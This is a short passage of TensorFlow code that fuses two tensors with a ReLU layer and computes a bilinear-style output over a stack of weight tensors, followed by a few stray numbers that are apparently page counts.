ab_fusion = tf.reshape(tf.concat([a, b_tile], -1), [-1, a_dim+b_dim]) #(b*m, d_a+d_b) a_re = a_re + tf.nn.relu(tf.matmul(ab_fusion, W)+ bias) #(b*m, d_a) output = tf.concat([tf.matmul( tf.reshape(tf.matmul(a_re, T_k), [-1, element_size, emb_dim]), tf.expand_dims(b, -1)) for T_k in tf.unstack(T_dropout, axis=0)], -1) if activation != None: output = activation(output) return output
7,801
1
140